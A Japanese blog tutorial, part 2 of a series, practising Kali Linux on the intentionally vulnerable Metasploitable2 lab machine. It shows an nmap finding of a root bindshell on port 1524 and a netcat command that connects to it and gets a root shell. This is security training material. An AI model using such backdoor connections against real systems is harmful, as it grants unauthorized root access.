セキュリティ

「Metasploitable2」で学ぶKali Linuxの基本#2[rootのバックドア]

「Metasploitable2」で学ぶKali Linuxの基本#1[Nmap,vsftpdの脆弱性]今回は、前回インストールしたKali Linuxを触っていきましょう。 https://raspiblog.com/securit...

↑前回

1524/tcp  open  bindshell   Metasploitable root shell

nmapで前回スキャンした際にこのようなものを発見しました。名前にある通り、誰かが作ったrootのバックドアのようです。とりあえず接続してみます。netcatを使います。

Contents
  1. NetCat

NetCat

netcatはネットワークを扱うツールとして知られています。接続していきます。

$ nc 192.168.56.*** 1524

IPアドレスとポートを設定して実行します。

root@metasploitable:/#
$ whoami
root

rootのバックドアであることがわかりました。次回は違うOSでハッキングを実践していきます。

評価しない評価する
(この記事を評価してください!)
読み込み中...
連絡

記事について何か疑問に思ったこと、うまく動かなくなっているところ、誤字脱字、感想などはコメント欄は廃止したのでTwitterのDMもしくは@blog_raspiでツイートしてください。できる限り見ると思います。(今のところ誰からも来ないから大丈夫)(誰かツイートしてーー(´;ω;`))

COMMENT

メールアドレスが公開されることはありません。